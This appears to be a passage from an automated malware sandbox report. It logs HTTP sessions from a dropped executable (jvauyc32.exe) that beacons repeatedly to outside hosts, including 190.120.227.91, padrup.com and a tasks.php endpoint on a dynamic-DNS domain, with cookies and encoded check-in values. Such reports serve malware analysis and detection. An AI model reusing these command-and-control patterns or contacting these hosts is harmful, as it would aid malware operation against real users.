                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726713896 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 37 61 62 62 34 33 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 1467abb434');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.730823994 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:24 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_f9Iiz4upIrRuYENXmsH3tjU9PQfJov+YPoVdTtGyRHpNSmE6fb5auFieZCI0ADUrfisnDpaPF9MrBGHo77kfqQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732449055 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE0NC4wMjAzOjg2YmU4YWFiNDhiYzkxMzE1ZjBhYTIwYmQ3ZDdkNDJlYWYyZTU0YzQwNzlkYTgyZWU4YjBhOTdmYzU0OWVkYzY6NjcxMjNiOTAwNGYzNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732451916 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732455969 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 37 61 62 62 34 33 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 1467abb434');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          16192.168.2.949732190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.846174002 CEST168OUTGET /sobakavolos.gif?3ff2df5=201165279 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          17192.168.2.949733194.5.152.215807352C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.224838018 CEST272OUTPOST /n/tasks.php HTTP/1.0
                                                                                                                                                                                                                                                                                          Host: n.ddnsgratis.com.br
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
                                                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                          Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
                                                                                                                                                                                                                                                                                          Content-length: 12
                                                                                                                                                                                                                                                                                          Data Raw: 5f 77 76 3d 5a 57 35 30 5a 58 49 3d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: _wv=ZW50ZXI=
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.335000992 CEST586INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:26 GMT
                                                                                                                                                                                                                                                                                          Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
                                                                                                                                                                                                                                                                                          X-Powered-By: PHP/5.6.14
                                                                                                                                                                                                                                                                                          Status: 404 Not Found
                                                                                                                                                                                                                                                                                          Content-Length: 357
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf8
                                                                                                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-c3VjY2Vzcw==--->


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          18192.168.2.949735185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.409254074 CEST155OUTGET /sobaka1.gif?47aa66b=526028013 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465254068 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:30 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Ig0XsCp5ELL0xze+8PI0DHPPR6TgFbRZ9i9RL2OKASVXvwhM4rxxEsKC6I7toPK4UeqFQE5fZVJNZ/PPz0cHIQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465279102 CEST214INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE1MC4xMTEyOmM5OWYzY2UwNjliMzQ4MDQ1ZTA0ZTY5OTFjZGY3NmU3NmUyYzI5MmMwOGY3ODFjN2I5NWMyYjU0MTM
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465325117 CEST1236INData Raw: 36 65 65 0d 0a 32 59 6a 49 78 4d 44 55 36 4e 6a 63 78 4d 6a 4e 69 4f 54 59 78 59 6a 49 33 4e 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27
                                                                                                                                                                                                                                                                                          Data Ascii: 6ee2YjIxMDU6NjcxMjNiOTYxYjI3Ng==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465367079 CEST550INData Raw: 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74
                                                                                                                                                                                                                                                                                          Data Ascii: .'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123b96&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '2b42ab85781007a0cc0f13dc2cf9248a53045160');</script><scr


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          19192.168.2.949736190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.492866993 CEST168OUTGET /sobakavolos.gif?4991659=617132744 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          20192.168.2.949737185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.799225092 CEST155OUTGET /sobaka1.gif?50e8edc=169680312 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978919029 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:36 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_R55ZA4ClrQoDlBVAYm89k3zx3yaVdbNlNsP1X0a9QaZw5qHCczlQWr6kZXKwCtEF3QGmbrKVRoGF1tFweVffiw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978931904 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE1Ni41MzI2OmFiMWNmZTUzYmEwY2JlMGYwYWNiZjQwMmFjNTlhYWM0MTFhNzcxNThmOWRhNTI1NDc2ZDNmOGY1MDM2MmQ3ZTM6NjcxMjNiOWM4MjA2ZA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978941917 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978952885 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 34 30 65 37 37 65 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 14640e77ef');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978971958 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 34 30 65 37 37 65 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 14640e77ef');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          21192.168.2.949738190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.028320074 CEST168OUTGET /sobakavolos.gif?542972c=882501560 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          22192.168.2.949740185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.642599106 CEST155OUTGET /sobaka1.gif?5b7e0de=767493872 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705452919 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:42 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_uJ23PUJ+/lXIeUehIHePTtO/k4YOGqySpsyfWXjqHW13ZiTtEnig4MhMRVerDUKl0MVcthyZ9o/CuCoDIqM0GQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
